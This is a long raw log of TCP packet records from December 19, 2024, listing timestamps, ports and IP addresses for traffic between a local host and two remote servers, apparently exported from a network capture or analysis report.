                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.950937986 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.951703072 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.951756954 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.951812029 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.951889992 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.951906919 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.951936960 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.952629089 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.952683926 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.952718973 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.952735901 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.952764988 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.953460932 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.953521967 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.953556061 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.953572035 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.953593016 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.954407930 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.954664946 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.954713106 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.954719067 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.954755068 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.954802990 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.955543995 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.955591917 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.955599070 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.955635071 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.955682039 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.956442118 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.956494093 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.956530094 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.956547022 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.956568956 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.956598043 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.957334995 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.957389116 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.957389116 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.957426071 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.957437992 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.957473040 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.958225965 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.958277941 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.958291054 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.958312988 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.958328009 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.959177017 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.959230900 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.959285021 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.959352016 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.959400892 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.960014105 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.960068941 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.960103989 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.960119963 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.960144043 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.960874081 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.960927010 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.960961103 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.960978031 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.960999966 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.961779118 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.961813927 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.961895943 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.961918116 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.961934090 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.967475891 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.967511892 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.967546940 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.967567921 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.967591047 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.967941999 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.967977047 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.968019962 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.968029022 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.968765974 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.968821049 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.125422955 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.125484943 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.125489950 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.125531912 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.125540018 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.125952005 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.125987053 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.126000881 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.126040936 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.126092911 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.126277924 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.126431942 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.126477957 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.126482964 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.126508951 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.126548052 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.126549006 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.126559019 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.126604080 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.126722097 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.126775026 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.126949072 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.127043009 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.127093077 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.127263069 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.127321959 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.127347946 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.127382994 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.127434969 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.128175020 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.128226995 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.128258944 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.128292084 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.128308058 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.128329039 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.128906965 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.128958941 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.128962040 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.128997087 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.129004955 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.129045963 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.129781961 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.129834890 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.129834890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.129873037 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.129901886 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.129914999 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.130670071 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.130713940 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.130723953 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.130759001 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.130773067 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.130811930 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.131633043 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.131686926 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.131686926 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.131724119 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.131732941 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.131764889 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.132509947 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.132560015 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.132603884 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.132637978 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.132688999 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.133389950 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.133446932 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.133466959 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.133501053 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.133522034 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.133537054 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.134282112 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.134336948 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.134350061 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.134385109 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.134408951 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.134423971 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.134567022 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.135160923 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.135206938 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.135215998 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.135251999 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.135256052 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.135324001 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.136022091 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.136075020 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.136075974 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.136112928 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.136123896 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.136154890 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.136909008 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.136960983 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.136964083 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.137000084 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.137011051 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.137042046 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.137814045 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.137864113 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.137867928 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.137904882 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.137917995 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.137947083 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.138761997 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.138796091 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.138811111 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.138832092 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.138834000 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.138874054 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.139571905 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.139621973 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.139625072 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.139659882 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.139671087 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.139702082 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.140461922 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.140516043 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.140517950 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.140552044 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.140558958 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.140595913 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.141355991 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.141410112 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.141417027 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.141453028 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.141462088 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.141489983 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.142261982 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.142313957 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.142316103 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.142352104 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.142359972 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.142393112 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.143086910 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.143141031 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.143160105 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.143186092 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.143230915 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.143239021 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.143274069 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.143285990 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.143318892 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.144038916 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.144088984 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.144094944 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.144130945 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.144140005 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.144171953 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.144897938 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.144949913 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.144953012 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.144994974 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.144999027 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.145029068 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.145801067 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.145853043 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.145857096 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.145891905 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.145904064 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.145932913 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.146701097 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.146760941 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.146982908 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.147031069 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.147039890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.147077084 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.147088051 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.147115946 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.147872925 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.147923946 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.147931099 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.147967100 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.147977114 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.148009062 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.148753881 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.148807049 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.148809910 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.148845911 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.148858070 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.148904085 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.149329901 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.149384022 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.149403095 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.149651051 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.149709940 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.149740934 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.149776936 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.149787903 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.149817944 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.150551081 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.150602102 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.150607109 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.150644064 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.150655031 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.150688887 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.151429892 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.151479006 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.151485920 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.151520967 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.151534081 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.151563883 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.152324915 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.152379036 CET804986031.41.244.11192.168.2.4
